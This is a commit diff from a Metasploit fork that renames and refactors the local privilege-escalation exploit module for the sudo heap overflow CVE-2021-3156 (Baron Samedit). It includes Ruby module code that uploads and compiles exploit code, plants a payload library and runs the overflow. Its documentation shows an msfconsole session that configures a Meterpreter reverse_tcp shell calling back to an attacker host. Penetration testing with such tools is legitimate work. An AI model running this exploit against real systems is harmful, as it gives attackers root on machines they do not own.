adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Implement feedback from PR review

Browse Source
This commit is contained in:
Spencer McIntyre
2021-02-04 09:25:40 -05:00
parent c33c08bae9
commit 7281d00938
3 changed files with 32 additions and 54 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/local/cve_2021_3156_sudo.md → documentation/modules/exploit/linux/local/sudo_baron_samedit.md
+8 -8
View File
@@ -1,14 +1,14 @@
## Vulnerable Application
A heap based buffer overflow exists in the sudo command line utility that can be exploited by a local attacker
to gain elevated privileges. The vulnerability was interested in July of 2011 and affects version 1.8.2
to gain elevated privileges. The vulnerability was introduced in July of 2011 and affects version 1.8.2
through 1.8.31p2 as well as 1.9.0 through 1.9.5p1 in their default configurations. The technique used by this
implementation leverages the overflow to overwrite a `service_user` struct in memory to reference an attacker
controlled library which results in it being loaded with the elevated privileges held by sudo.
### Manual Target
The exploit requires a number of lengths / offsets to function correction. The manual target can be used to specify
The exploit requires a number of lengths / offsets to function correctly. The manual target can be used to specify
these values if they are known. To identify the values, use the `brute.sh` script from the original PoC repository at
[blasty/CVE-2021-3156][1].
@@ -41,7 +41,7 @@ Example steps in this format (is also in the PR):
1. Install the application
1. Start msfconsole
1. Do: `use exploit/linux/local/cve_2021_3156_sudo`
1. Do: `use exploit/linux/local/sudo_baron_samedit`
1. Set the necessary options (target, payload, etc.)
1. Do: `run`
@@ -82,15 +82,15 @@ BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/ssh/sshexec) > use exploit/linux/local/cve_2021_3156_sudo
msf6 exploit(multi/ssh/sshexec) > use exploit/linux/local/sudo_baron_samedit
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_3156_sudo) > set SESSION 1
msf6 exploit(linux/local/sudo_baron_samedit) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_3156_sudo) > set LHOST 192.168.159.128
msf6 exploit(linux/local/sudo_baron_samedit) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(linux/local/cve_2021_3156_sudo) > set TARGET 1
msf6 exploit(linux/local/sudo_baron_samedit) > set TARGET 1
TARGET => 1
msf6 exploit(linux/local/cve_2021_3156_sudo) > exploit
msf6 exploit(linux/local/sudo_baron_samedit) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Executing automatic check (disable AutoCheck to override)
lib/msf/core/post/linux/compile.rb
+6 -3
View File
@@ -15,14 +15,14 @@ module Compile
end
def live_compile?
return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
return false unless %w{ Auto True }.include?(datastore['COMPILE'])
if has_gcc?
vprint_good 'gcc is installed'
return true
end
unless datastore['COMPILE'].eql? 'Auto'
unless datastore['COMPILE'] == 'Auto'
fail_with Module::Failure::BadConfig, 'gcc is not installed. Set COMPILE False to upload a pre-compiled executable.'
end
end
@@ -44,7 +44,10 @@ module Compile
unless output.blank?
print_error output
fail_with Module::Failure::BadConfig, "#{path}.c failed to compile. Set COMPILE False to upload a pre-compiled executable."
message = "#{path}.c failed to compile."
# don't mention the COMPILE option if it was deregistered
message << ' Set COMPILE to False to upload a pre-compiled executable.' if options.include?('COMPILE')
fail_with Module::Failure::BadConfig, message
end
chmod path
modules/exploits/linux/local/cve_2021_3156_sudo.rb → modules/exploits/linux/local/sudo_baron_samedit.rb
+18 -43
View File
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Local
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Post::File
include Msf::Post::Unix
include Msf::Post::Linux::Compile
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
@@ -17,10 +18,10 @@ class MetasploitModule < Msf::Exploit::Local
super(
update_info(
info,
'Name' => 'Heap-Based Buffer Overflow in Sudo',
'Name' => 'Sudo Heap-Based Buffer Overflow',
'Description' => %q(
A heap based buffer overflow exists in the sudo command line utility that can be exploited by a local attacker
to gain elevated privileges. The vulnerability was interested in July of 2011 and affects version 1.8.2
to gain elevated privileges. The vulnerability was introduced in July of 2011 and affects version 1.8.2
through 1.8.31p2 as well as 1.9.0 through 1.9.5p1 in their default configurations. The technique used by this
implementation leverages the overflow to overwrite a service_user struct in memory to reference an attacker
controlled library which results in it being loaded with the elevated privileges held by sudo.
@@ -60,17 +61,15 @@ class MetasploitModule < Msf::Exploit::Local
)
)
register_options(
[
OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ])
], self.class
)
register_options([
OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ])
])
register_advanced_options(
[
OptString.new('Lengths', [ false, 'The lengths to set as used by the manual target. (format: #,#,#,#)' ], regex: /(\d+(,[ ]*| )){3}\d+/)
]
)
register_advanced_options([
OptString.new('Lengths', [ false, 'The lengths to set as used by the manual target. (format: #,#,#,#)' ], regex: /(\d+(,[ ]*| )){3}\d+/)
])
deregister_options('COMPILE')
end
def get_versions
@@ -81,13 +80,6 @@ class MetasploitModule < Msf::Exploit::Local
versions[:sudo] = version if version =~ /^\d/
end
# this libc version check will need to be updated to support non-linux targets like OSX
output = cmd_exec("ldd --version")
if output
version = output.split("\n").first.split(' ').last
versions[:libc] = version if version =~ /^\d/
end
versions
end
@@ -103,6 +95,11 @@ class MetasploitModule < Msf::Exploit::Local
[Gem::Version.new('1.9.0'), Gem::Version.new('1.9.5.1')],
]
if sudo_version == '1.8.31'
# Ubuntu patched it as version 1.8.31-1ubuntu1.2 which is reported as 1.8.31
return CheckCode::Detected("sudo #{sudo_version} maybe a vulnerable build.")
end
if vuln_builds.any? { |build_range| Gem::Version.new(sudo_version).between?(*build_range) }
return CheckCode::Appears("sudo #{sudo_version} is a vulnerable build.")
end
@@ -115,25 +112,6 @@ class MetasploitModule < Msf::Exploit::Local
write_file path, data
end
def upload_and_compile(path, data)
upload "#{path}.c", data
register_files_for_cleanup("#{path}.c")
gcc_cmd = "gcc -o #{path} #{path}.c -lutil"
if session.type.eql? 'shell'
gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
end
output = cmd_exec gcc_cmd
unless output.blank?
print_error output
fail_with Failure::Unknown, "#{path}.c failed to compile"
end
register_files_for_cleanup(path)
cmd_exec "chmod +x #{path}"
end
def exploit
if target.name == 'Manual'
fail_with(Failure::BadConfig, 'The "Lengths" advanced option must be specified for the manual target') if datastore['Lengths'].blank?
@@ -146,13 +124,10 @@ class MetasploitModule < Msf::Exploit::Local
path = datastore['WritableDir']
cmd_exec("mkdir -p #{path}/libnss_X")
register_dirs_for_cleanup("#{path}/libnss_X")
file_name = rand_text_alphanumeric rand(5..10)
upload_and_compile("#{path}/#{file_name}", ::File.binread(::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-3156', 'exploit.c')))
file_name = rand_text_alphanumeric(5..10)
upload_and_compile("#{path}/#{file_name}", exploit_data('CVE-2021-3156', 'exploit.c'), '-lutil')
upload("#{path}/libnss_X/P0P_SH3LLZ_ .so.2", generate_payload_dll)
cmd_exec("#{path}/#{file_name} #{arguments}")
end
end